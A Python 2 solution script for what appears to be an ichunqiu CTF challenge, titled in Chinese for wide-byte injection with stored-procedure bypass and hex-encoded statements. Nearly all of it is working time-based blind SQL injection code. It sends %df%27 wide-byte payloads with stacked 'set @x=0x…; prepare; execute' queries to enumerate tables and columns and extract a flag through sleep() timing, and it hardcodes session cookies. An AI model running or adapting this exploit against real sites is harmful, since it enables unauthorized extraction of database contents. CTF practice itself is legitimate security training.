宽字节注入+存储过程绕过+语句转十六进制
脚本如下
import requests
flag = ""
cookie = {
'ci_session': '934c5dbfca4a789a17b73c1f36c6ec78b81b02b3',
'UM_distinctid': '16ec9cac110576-07f6681d74fa2e-e343166-144000-16ec9cac111912',
'chkphone': 'acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O',
'Hm_lvt_2d0601bd28de7d49818249cf35d95943': '1582019027,1582279859',
'Hm_lpvt_2d0601bd28de7d49818249cf35d95943': '1582289798',
'__jsluid_h': '97070b4ac064633e5f63572668133229',
'Host': '487e2fb9c3434f49b036a43ee0f1638bb3374bb968df466b.changame.ichunqiu.com'
}
def str_to_hex(s):
return ''.join([hex(ord(c)).replace('0x', '') for c in s])
temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
temp_data = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~ABCDEFGHIJKLMNOPQRSTUVWXYZ'
schema_name = 'pdotest'
table_name = 'table1'
column_name = 'fllllll4g'
##################################################得到表 列 后 读flag###########################
for y in xrange(0, 10):
data = ''
for z in xrange(1, 50):
key = 0
for i in temp_data:
payload = 'select if (ascii(mid((select ' + column_name + ' from `' + schema_name + '`.' + table_name + \
' limit ' + str(y) + ',1),' + str(z) + ',1))=ascii(\'' + str(i) + '\'), sleep(2) ,1)'
payload = str_to_hex(payload)
url = 'http://27bec58bb637491db1b5118bd0b8b9b9961e390aa45243db.changame.ichunqiu.com/?id=1%df%27%20;set%20@x=0x' + payload + ';prepare%20a%20from%20@x;execute%20a;'
try:
r = requests.get(url=url, cookies=cookie, timeout=1)
except requests.exceptions.ReadTimeout:
data = data + str(i)
print data
key = 1
if key == 0:
break
if data == '':
break
print 'one data of ' + schema_name + '.' + table_name + '\'s ' + column_name + ' is ' + data
#############################################正常盲注流程 -table -column -data###########################
for x in xrange(0, 20):
table_name = ''
for y in xrange(1, 20):
key = 0
for i in temp:
payload = 'select if (ascii(mid((select table_name from information_schema.tables where table_schema="'+schema_name+'" limit ' + \
str(x) + ',1),' + str(y) + ',1))=ascii(\'' + str(i) + '\') , sleep(5) ,1)'
payload = str_to_hex(payload)
url = 'http://c0be88ec8f2b45c7a2e47a5592b6ce07ba21bed0a847436b.changame.ichunqiu.com/?id=1%df%27%20;set%20@x=0x'+payload+';prepare%20a%20from%20@x;execute%20a;'
try:
r = requests.get(url=url, cookies=cookie, timeout=4)
except requests.exceptions.ReadTimeout:
key = 1
table_name = table_name + str(i)
print(table_name)
break
if key == 0:
break
if table_name == '':
break
print 'one of tables is:' + table_name
for p in xrange(0, 20):
column_name = ''
for q in xrange(1, 20):
key = 0
for i in temp:
payload = 'select if (ascii(mid((select column_name from information_schema.columns where table_schema="'+schema_name+\
'" and table_name="'+table_name+'" limit '+str(p)+',1),'+str(q)+',1))=ascii(\''+ str(i)+'\'), sleep(5) ,1)'
payload = str_to_hex(payload)
url = 'http://c0be88ec8f2b45c7a2e47a5592b6ce07ba21bed0a847436b.changame.ichunqiu.com/?id=1%df%27%20;set%20@x=0x' + payload + ';prepare%20a%20from%20@x;execute%20a;'
try:
r = requests.get(url=url, cookies=cookie, timeout=4)
except requests.exceptions.ReadTimeout:
key = 1
column_name = column_name + str(i)
if key == 0:
break
if column_name == '':
break
print 'a column name of ' + table_name + ' is ' + column_name
for y in xrange(0, 10):
data = ''
for z in xrange(1, 20):
key = 0
for i in temp_data:
payload = 'select if (ascii(mid((select '+column_name+' from `'+schema_name+'`.'+table_name+\
' limit '+str(y)+',1),'+str(z)+',1))=ascii(\''+str(i)+'\'), sleep(5) ,1)'
payload = str_to_hex(payload)
url = 'http://c0be88ec8f2b45c7a2e47a5592b6ce07ba21bed0a847436b.changame.ichunqiu.com/?id=1%df%27%20;set%20@x=0x' + payload + ';prepare%20a%20from%20@x;execute%20a;'
try:
r = requests.get(url=url, cookies=cookie, timeout=4)
except requests.exceptions.ReadTimeout:
data = data + str(i)
key = 1
if key == 0:
break
if data == '':
break
print 'one data of ' + schema_name + '.' + table_name + '\'s ' + column_name + ' is ' + data
